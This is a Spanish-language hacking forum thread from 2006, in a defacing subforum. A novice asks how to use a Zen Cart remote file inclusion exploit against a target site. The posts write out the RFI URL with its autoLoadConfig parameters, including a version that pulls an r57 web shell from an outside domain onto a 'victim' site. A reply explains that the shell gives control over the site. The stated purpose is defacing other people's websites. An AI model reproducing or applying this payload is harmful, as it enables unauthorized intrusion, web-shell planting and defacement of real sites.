Normas del foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Noviembre 19, 2008, 04:06:58
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Defacing  |  Tema: deface en proceso 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: deface en proceso  (Leído 306 veces)
damiguero
Habitual
*****
Desconectado Desconectado

Mensajes: 180


damiguero@hotmail.com
Ver Perfil WWW Email
« en: Octubre 01, 2006, 11:41:56 »

scanee una web php (con SSS) y me salieron muchas vulneravilidades (rojo)
le di al numero de una vulneravilidad como dice en el manual y me salio una pagina luego le di click en exploit...

me salio lo siguiente: Attackers can exploit these issues via a web client.

y un link asi: /data/vulnerabilities/exploits/zencart-rfi.txt

le doy click en el link y me sale lo siguiente en todo una pagina:

Código:
http://www.example.com/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://shell

la verdad soy nuevo en esto asi que me gustaria saber que es eso... un exploit?
que hago con eso?
intente ponerlo asi como dice el ejemplo:

Código:
http://webvictima.com/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://shell

y solo me salen noticias pero ninguna lista de numeros y letras (algo asi hice la ves pasada con una web y utilice un crackeador)}

12132gh3213h3213k323g323g32
23342n4nl4k343hjg4h3g3h34344
ewkjnje6ewew5ew6e4eq0we93e

bueno no se si me equivoco aver si me entienden y me pueden ayudar si?

pd.- hay muchas bulneravilidades por ejemplo en una me sale para utilizar un exploit asi:
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
http://downloads.securityfocus.com/vulnerabilities/exploits/pmwiki2.1.19_zend_hash_rce_poc.txt


salu2




« Última modificación: Octubre 01, 2006, 11:48:53 por damiguero » En línea

mi web:
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.damiguero.tk
Sasuk3
Visitante
« Respuesta #1 en: Octubre 01, 2006, 06:46:48 »

Son remote file inclusion..

Usar una shell remota para poder administrar el sitio con privilegios X... depende del path que hayas usado..

Son asi...


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion

Y asi obtienes una shell que es como el control para manejar la web... bueno una interfaz..

En vez de donde dice shell.txt obviamente tienes que poner una.. shell que tengas hay muchas.. te dejo algunas..


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion

Salud0z

En línea
damiguero
Habitual
*****
Desconectado Desconectado

Mensajes: 180


damiguero@hotmail.com
Ver Perfil WWW Email
« Respuesta #2 en: Octubre 02, 2006, 03:09:35 »

bueno aver como ya dije no tengo mucha experiencia en esto....
aver aver... esas dos direcciones son shell's verdad?

entonces quedaria asi la direccion:
Código:
http://webvictima.com/index.php?autoLoadConfig[999][0][autoType=include&autoLoadConfig[999][0][loadFile=http://caringtoday.org/r57.txt

HuhHuh???que hago con esa direccion completa?HuhHuhHuhHuhHuhHuh?

aver si tienen un poquito mas de paciencia y me dan de cucharaditas... jejeje

salu2

En línea

mi web:
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.damiguero.tk
Sasuk3
Visitante
« Respuesta #3 en: Octubre 02, 2006, 08:07:59 »

bueno aver como ya dije no tengo mucha experiencia en esto....
aver aver... esas dos direcciones son shell's verdad?

entonces quedaria asi la direccion:
Código:
http://webvictima.com/index.php?autoLoadConfig[999][0][autoType=include&autoLoadConfig[999][0][loadFile=http://caringtoday.org/r57.txt

HuhHuh???que hago con esa direccion completa?HuhHuhHuhHuhHuhHuh?

aver si tienen un poquito mas de paciencia y me dan de cucharaditas... jejeje

salu2



Estas hablando que la web tiene esa vulnerabilidad.. por lo tanto tiene que ser factible a abrir la shell y ya una vez en ella puedes manipular los datos viendo el path diria que tendrias buenos permisos... de todos modos puede que este Safe Mode On...etc

Lee mas las bases es lo mejor que puedes hacer asi empiezas a ver como funciona esto... por que defacear una pagina asi por asi no vale la pena Wink
En línea
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Defacing  |  Tema: deface en proceso « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.7 | SMF © 2006-2007, Simple Machines LLC